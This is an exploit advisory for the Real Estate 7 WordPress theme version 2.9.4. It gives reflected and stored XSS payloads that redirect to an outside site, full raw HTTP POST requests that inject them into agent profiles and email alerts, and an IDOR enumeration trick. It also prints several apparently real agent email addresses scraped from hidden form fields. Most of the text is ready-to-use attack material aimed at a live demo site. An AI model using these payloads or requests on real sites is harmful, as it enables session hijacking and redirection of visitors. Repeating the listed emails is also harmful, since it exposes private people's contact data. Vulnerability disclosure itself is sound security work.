# Exploit Title: Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities # Google Dork: /wp-content/themes/realestate-7/ # Date: 12/01/2020 # Exploit Author: m0ze # Vendor Homepage: https://contempothemes.com/ # Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778 # Version: 2.9.4 # Tested on: Kali Linux # CVE: - # CWE: 79, 200, 319 ----[]- Info: -[]---- Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/ Demo account #1: agent/agent (login/password) PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/ PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/ ----[]- Reflected XSS: -[]---- Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng ----[]- Persistent XSS -> Agent Profile: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable textarea: «Agent Testimonials» (checkbox on «Show on Agents Page» is required). Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1 Host: contempothemes.com User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------17074317185520 Content-Length: 3843 Origin: https://contempothemes.com Connection: close Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/ Cookie: _your_cookies_here_ Upgrade-Insecure-Requests: 1 -----------------------------17074317185520 Content-Disposition: form-data; name="first_name" Agent -----------------------------17074317185520 Content-Disposition: form-data; name="last_name" Demo -----------------------------17074317185520 Content-Disposition: form-data; name="nickname" agent -----------------------------17074317185520 Content-Disposition: form-data; name="display_name" Agent Demo -----------------------------17074317185520 Content-Disposition: form-data; name="user_url" -----------------------------17074317185520 Content-Disposition: form-data; name="description" -----------------------------17074317185520 Content-Disposition: form-data; name="twitterhandle" # -----------------------------17074317185520 Content-Disposition: form-data; name="facebookurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="instagramurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="linkedinurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="youtubeurl" # -----------------------------17074317185520 Content-Disposition: form-data; name="isagent" yes -----------------------------17074317185520 Content-Disposition: form-data; name="agentorder" -----------------------------17074317185520 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1024000 -----------------------------17074317185520 Content-Disposition: form-data; name="ct_profile_img"; filename="" Content-Type: application/octet-stream -----------------------------17074317185520 Content-Disposition: form-data; name="mobile" 6195556589 -----------------------------17074317185520 Content-Disposition: form-data; name="fax" 6195556588 -----------------------------17074317185520 Content-Disposition: form-data; name="title" Agent -----------------------------17074317185520 Content-Disposition: form-data; name="tagline" Selling the Dream! -----------------------------17074317185520 Content-Disposition: form-data; name="agentlicense" 123456 -----------------------------17074317185520 Content-Disposition: form-data; name="userTestimonial" <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------17074317185520 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1024000 -----------------------------17074317185520 Content-Disposition: form-data; name="ct_broker_logo"; filename="" Content-Type: application/octet-stream -----------------------------17074317185520 Content-Disposition: form-data; name="brokeragename" -----------------------------17074317185520 Content-Disposition: form-data; name="brokeragelicense" -----------------------------17074317185520 Content-Disposition: form-data; name="office" 6195553698 -----------------------------17074317185520 Content-Disposition: form-data; name="address" 101 Front St, Suite 100 -----------------------------17074317185520 Content-Disposition: form-data; name="city" San Diego -----------------------------17074317185520 Content-Disposition: form-data; name="state" CA -----------------------------17074317185520 Content-Disposition: form-data; name="postalcode" 92101 -----------------------------17074317185520 Content-Disposition: form-data; name="updateuser" Update Profile -----------------------------17074317185520 Content-Disposition: form-data; name="_wpnonce" b2e5069987 -----------------------------17074317185520 Content-Disposition: form-data; name="_wp_http_referer" /wp-real-estate-7/minimal-demo/account-settings/ -----------------------------17074317185520 Content-Disposition: form-data; name="action" update-user -----------------------------17074317185520-- ----[]- Persistent Self-XSS -> Listing Email Alerts: -[]---- It's self-XSS, but still. Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1 Host: contempothemes.com User-Agent: Mozilla/5.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 294 Origin: https://contempothemes.com Connection: close Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/ Cookie: _your_cookies_here_ ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com ----[]- IDOR: -[]---- Parsing this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digits for the «p» parameter can lead you to some interesting results like this: https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (with package name, order date and unique login/author name as a useful information). ----[]- Information Exposure: -[]---- Each agent profile page contains the «Email» link as a pop-up form trigger. This form contains hidden input field with agent unique email address, for example: <input type="hidden" id="ctyouremail" name="ctyouremail" value="chris@contempographicdesign.com" /> <input type="hidden" id="ctyouremail" name="ctyouremail" value="adams@adamsgroup.website" /> <input type="hidden" id="ctyouremail" name="ctyouremail" value="alpiskris@hotmail.com" /> <input type="hidden" id="ctyouremail" name="ctyouremail" value="skyking1978@gmail.com" /> Same result you can achieve by watching the source code of agent profile page (it's faster if you'll search in code for «@» symbol from the bottom).